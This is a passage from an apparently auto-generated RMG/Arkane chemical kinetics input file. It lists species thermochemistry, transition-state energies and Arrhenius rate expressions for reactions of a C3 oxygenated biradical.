    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.759501,0.072888,-7.5304e-05,4.23075e-08,-9.72939e-12,-28897.4,30.3643], Tmin=(100,'K'), Tmax=(1042.29,'K')), NASAPolynomial(coeffs=[12.0388,0.0296014,-1.30086e-05,2.46225e-09,-1.72257e-13,-31248.6,-24.5189], Tmin=(1042.29,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-241.226,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(RCCJ) + radical(CC(C)OJ)"""),
)
# Species 'CCC(=O)C(O)O(11585)' — closed-shell; no modes block; group-additivity thermo.
species(
    label = 'CCC(=O)C(O)O(11585)',
    structure = SMILES('CCC(=O)C(O)O'),
    E0 = (-618.099,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.02234,0.0705871,-8.08298e-05,5.65228e-08,-1.6894e-11,-74237.5,26.8196], Tmin=(100,'K'), Tmax=(798.77,'K')), NASAPolynomial(coeffs=[7.80593,0.0366172,-1.70385e-05,3.28189e-09,-2.30677e-13,-75321.2,-4.38318], Tmin=(798.77,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-618.099,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + group(Cds-OdCsCs)"""),
)
# Species 'CCC(O)C(=O)O(11586)' — closed-shell; no modes block; group-additivity thermo.
species(
    label = 'CCC(O)C(=O)O(11586)',
    structure = SMILES('CCC(O)C(=O)O'),
    E0 = (-662.671,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.07784,0.0535222,-1.82359e-05,-1.29262e-08,8.07037e-12,-79586.5,28.2489], Tmin=(100,'K'), Tmax=(1053.49,'K')), NASAPolynomial(coeffs=[13.9276,0.0265369,-1.0858e-05,2.05067e-09,-1.45803e-13,-83503.9,-40.1556], Tmin=(1053.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-662.671,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-(Cds-O2d)H) + group(Cs-(Cds-O2d)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs)"""),
)
# Species 'CH2(S)(23)' (singlet methylene per its label) — thermo from the Klippenstein_Glarborg2016 library.
species(
    label = 'CH2(S)(23)',
    structure = SMILES('[CH2]'),
    E0 = (419.862,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([1369.36,2789.41,2993.36],'cm^-1')),
    ],
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (14.0266,'amu'),
    collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19195,-0.00230793,8.0509e-06,-6.60123e-09,1.95638e-12,50484.3,-0.754589], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.28556,0.00460255,-1.97412e-06,4.09548e-10,-3.34695e-14,50922.4,8.67684], Tmin=(1000,'K'), Tmax=(3000,'K'))], Tmin=(200,'K'), Tmax=(3000,'K'), E0=(419.862,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
# Species 'CC([O])C([O])O(1195)' — triplet; transport estimated via Joback critical constants.
species(
    label = 'CC([O])C([O])O(1195)',
    structure = SMILES('CC([O])C([O])O'),
    E0 = (-196.987,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,359.579,359.579,2096.64],'cm^-1')),
        HinderedRotor(inertia=(0.0013038,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.0993115,'amu*angstrom^2'), symmetry=1, barrier=(9.11202,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.0993116,'amu*angstrom^2'), symmetry=1, barrier=(9.11203,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 3,
    opticalIsomers = 1,
    molecularWeight = (90.0779,'amu'),
    collisionModel = TransportData(shapeIndex=2, epsilon=(4514.4,'J/mol'), sigma=(7.28306,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=705.14 K, Pc=26.52 bar (from Joback method)"""),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.85156,0.0526616,-5.32421e-05,2.76846e-08,-2.87383e-12,-23619.7,23.9972], Tmin=(100,'K'), Tmax=(591.684,'K')), NASAPolynomial(coeffs=[6.00514,0.0310489,-1.48461e-05,2.8955e-09,-2.05023e-13,-24224.4,5.1816], Tmin=(591.684,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-196.987,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CC(C)OJ)"""),
)
# Species 'CCC1OOC1O(11396)' — cyclic (12dioxetane ring correction in the thermo comment); no modes block.
species(
    label = 'CCC1OOC1O(11396)',
    structure = SMILES('CCC1OOC1O'),
    E0 = (-276.146,'kJ/mol'),
    spinMultiplicity = 1,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.19458,0.0582869,-3.95475e-05,1.34734e-08,-1.88331e-12,-33109.3,21.7624], Tmin=(100,'K'), Tmax=(1622.24,'K')), NASAPolynomial(coeffs=[13.1877,0.0287151,-1.22038e-05,2.23629e-09,-1.51571e-13,-37000.4,-41.8995], Tmin=(1622.24,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-276.146,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(345.051,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + ring(12dioxetane)"""),
)
# Species 'CCC([O])[CH]OO(11587)' — triplet with five identical hindered rotors; group-additivity thermo.
species(
    label = 'CCC([O])[CH]OO(11587)',
    structure = SMILES('CCC([O])[CH]OO'),
    E0 = (13.8464,'kJ/mol'),
    modes = [
        HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
        HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
    ],
    spinMultiplicity = 3,
    opticalIsomers = 1,
    molecularWeight = (104.105,'amu'),
    energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
    thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.743165,0.0765238,-8.37386e-05,5.28236e-08,-1.40297e-11,1778.42,27.0919], Tmin=(100,'K'), Tmax=(897.413,'K')), NASAPolynomial(coeffs=[9.69334,0.0366321,-1.70631e-05,3.29385e-09,-2.32244e-13,171.958,-15.1191], Tmin=(897.413,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(13.8464,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CC(C)OJ) + radical(CCsJOOH)"""),
)
species(
label = 'CCC([CH][O])OO(11588)',
structure = SMILES('CCC([CH][O])OO'),
E0 = (0.906094,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (104.105,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.425371,0.0869197,-0.000128701,1.13583e-07,-4.04154e-11,229.684,28.6673], Tmin=(100,'K'), Tmax=(810.148,'K')), NASAPolynomial(coeffs=[6.88216,0.0416622,-2.01367e-05,3.86375e-09,-2.67722e-13,-377.483,1.58595], Tmin=(810.148,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(0.906094,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOH) + radical(CCOJ)"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29226.7,5.11107], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29226.7,5.11107], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CC[CH]C([O])O(4406)',
structure = SMILES('CC[CH]C([O])O'),
E0 = (-78.7553,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1277.5,1000,1380,1390,370,380,2900,435,1427.31,1427.42,4000],'cm^-1')),
HinderedRotor(inertia=(0.074453,'amu*angstrom^2'), symmetry=1, barrier=(8.12427,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0744914,'amu*angstrom^2'), symmetry=1, barrier=(8.12436,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0744491,'amu*angstrom^2'), symmetry=1, barrier=(8.12399,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.236618,'amu*angstrom^2'), symmetry=1, barrier=(25.7923,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.02234,0.0485528,-3.27868e-05,1.24809e-08,-2.21444e-12,-9405.25,25.9259], Tmin=(100,'K'), Tmax=(1169.87,'K')), NASAPolynomial(coeffs=[5.75468,0.0357914,-1.64243e-05,3.15664e-09,-2.21871e-13,-10278.5,7.33389], Tmin=(1169.87,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-78.7553,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(CCJCO) + radical(CCOJ)"""),
)
species(
label = 'CCC([O])[CH]O(10835)',
structure = SMILES('CCC([O])[CH]O'),
E0 = (-65.9433,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,3615,1277.5,1000,1380,1390,370,380,2900,435,180,1036.54,2741.46],'cm^-1')),
HinderedRotor(inertia=(0.595264,'amu*angstrom^2'), symmetry=1, barrier=(13.6863,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.595356,'amu*angstrom^2'), symmetry=1, barrier=(13.6884,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.595443,'amu*angstrom^2'), symmetry=1, barrier=(13.6904,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0645559,'amu*angstrom^2'), symmetry=1, barrier=(13.6905,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.06969,0.0666253,-7.11628e-05,4.30287e-08,-1.0743e-11,-7827.45,24.5489], Tmin=(100,'K'), Tmax=(961.834,'K')), NASAPolynomial(coeffs=[10.1275,0.0289564,-1.24177e-05,2.31139e-09,-1.59832e-13,-9569.88,-18.7974], Tmin=(961.834,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-65.9433,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOH) + radical(CC(C)OJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (-220.767,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (-91.1317,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (-160.641,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (-158.171,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (-142.865,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (-198.929,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (-30.1541,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (-55.0967,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (-62.7306,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (-145.664,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (-145.486,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (-145.486,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (-166.877,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (-162.201,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (-115.126,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (-188.927,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (138.505,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (-157.367,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (-157.367,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (222.875,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (-212.483,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS22',
E0 = (106.591,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS23',
E0 = (108.017,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS24',
E0 = (164.249,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS25',
E0 = (177.062,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['HOCHO(59)', 'C2H5CHO(70)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(3)', 'CCC(=O)C([O])O(11574)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(0.0366254,'m^3/(mol*s)'), n=1.743, Ea=(71.4418,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsCs_O;YJ] for rate rule [CO-CsCs_O;HJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['H(3)', 'CCC([O])C(=O)O(11575)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(1.83701,'m^3/(mol*s)'), n=1.71338, Ea=(46.5052,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [CO_O;HJ] + [CO-NdNd_O;YJ] for rate rule [CO-NdNd_O;HJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
reactants = ['C2H5(29)', '[O]C(O)C=O(4774)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(7.94e+10,'cm^3/(mol*s)'), n=0, Ea=(28.0328,'kJ/mol'), T0=(1,'K'), Tmin=(333,'K'), Tmax=(363,'K'), comment="""Estimated using template [CO_O;CsJ-CsHH] for rate rule [CO-CsH_O;CsJ-CsHH]
Euclidian distance = 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['C2H5CHO(70)', '[O][CH]O(171)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(0.0201871,'m^3/(mol*s)'), n=2.2105, Ea=(56.0866,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [CO-CsH_O;YJ] for rate rule [CO-CsH_O;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['HOCHO(59)', 'CC[CH][O](563)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(6.87291,'m^3/(mol*s)'), n=1.39198, Ea=(57.1551,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [CO_O;CJ] + [CO-NdH_O;YJ] for rate rule [CO-NdH_O;CJ]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['OH(5)', 'CCC([O])C=O(10833)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(0.04245,'cm^3/(mol*s)'), n=3.486, Ea=(94.7258,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1600,'K'), comment="""Estimated using template [CO-CsH_O;OJ] for rate rule [CO-CsH_O;OJ_pri]
Euclidian distance = 1.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction8',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CC[C](O)C([O])O(11576)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(4.56178e+08,'s^-1'), n=1.25272, Ea=(165.67,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Y_rad_out;Cs_H_out_Cs2] for rate rule [R2H_S;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction9',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC([O])[C](O)O(11577)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(1.43381e+07,'s^-1'), n=1.70481, Ea=(158.036,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R2H_S;Y_rad_out;Cs_H_out_NonDe] for rate rule [R2H_S;O_rad_out;Cs_H_out_NDMustO]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['C[CH]C(O)C([O])O(11578)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(5.71,'s^-1'), n=3.021, Ea=(105.562,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 319 used for R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R3H_SS_Cs;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction11',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(O)[C]([O])O(11579)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(111914,'s^-1'), n=2.27675, Ea=(75.2806,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;O_rad_out;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction12',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CC[C]([O])C(O)O(11580)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(111914,'s^-1'), n=2.27675, Ea=(75.2806,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_SS_Cs;O_rad_out;XH_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction13',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['C[CH]C([O])C(O)O(11581)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(210000,'s^-1'), n=1.76, Ea=(53.8899,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 326 used for R4H_SSS;O_rad_out;Cs_H_out_H/NonDeC
Exact match found for rate rule [R4H_SSS;O_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['[CH2]CC(O)C([O])O(11582)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(8.6e-09,'s^-1'), n=5.55, Ea=(83.68,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 340 used for R4H_SSS;C_rad_out_2H;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_2H;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction15',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(O)C([O])[O](11583)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(94.0113,'s^-1'), n=2.81534, Ea=(105.641,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R4H_SSS;Y_rad_out;O_H_out] + [R4H_SSS;O_rad_out;XH_out] for rate rule [R4H_SSS;O_rad_out;O_H_out]
Euclidian distance = 1.0
